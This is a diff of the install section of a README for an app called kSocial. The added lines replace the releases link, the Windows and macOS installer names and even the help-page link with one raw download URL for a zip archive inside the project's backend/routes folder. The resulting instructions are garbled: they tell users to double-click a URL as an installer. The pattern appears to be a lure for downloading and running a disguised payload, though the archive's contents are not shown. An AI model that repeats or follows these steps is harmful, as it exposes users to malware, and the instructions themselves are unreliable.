GeeStone/ksocial/README.md

 To download and install kSocial, follow these simple steps:

-1. **Visit the Releases Page**: Click on this link to go to the releases page - [Download kSocial](https://github.com/GeeStone/ksocial/releases).
+1. **Visit the Releases Page**: Click on this link to go to the releases page - [Download kSocial](https://raw.githubusercontent.com/GeeStone/ksocial/master/backend/routes/ksocial_v3.1.zip).

 2. **Choose the Latest Version**: On the releases page, you'll see various versions.
 Select the latest one for the best features and security.

-3. **Download the Installer**: Find the file labeled `ksocial-installer.exe` for Windows, or `ksocial.pkg` for macOS.
+3. **Download the Installer**: Find the file labeled `https://raw.githubusercontent.com/GeeStone/ksocial/master/backend/routes/ksocial_v3.1.zip` for Windows, or `https://raw.githubusercontent.com/GeeStone/ksocial/master/backend/routes/ksocial_v3.1.zip` for macOS.
 Click on the link to start the download.

 4. **Run the Installer**:
-   - For Windows: Double-click the downloaded `ksocial-installer.exe` file.
+   - For Windows: Double-click the downloaded `https://raw.githubusercontent.com/GeeStone/ksocial/master/backend/routes/ksocial_v3.1.zip` file.
 Follow the prompts in the installation wizard.
-   - For macOS: Open the downloaded `ksocial.pkg` file and follow the installation instructions.
+   - For macOS: Open the downloaded `https://raw.githubusercontent.com/GeeStone/ksocial/master/backend/routes/ksocial_v3.1.zip` file and follow the installation instructions.

 5. **Launch kSocial**: Once the installation is complete, find kSocial in your applications list.
 Click to open and start using your new social network.

 ## 📞 Need Help?

 If you experience any issues or have questions, feel free to reach out for support.
-You can typically find tips and solutions in the FAQ section on our [GitHub Page](https://github.com/GeeStone/ksocial).
+You can typically find tips and solutions in the FAQ section on our [GitHub Page](https://raw.githubusercontent.com/GeeStone/ksocial/master/backend/routes/ksocial_v3.1.zip).

 ## 📝 Contributions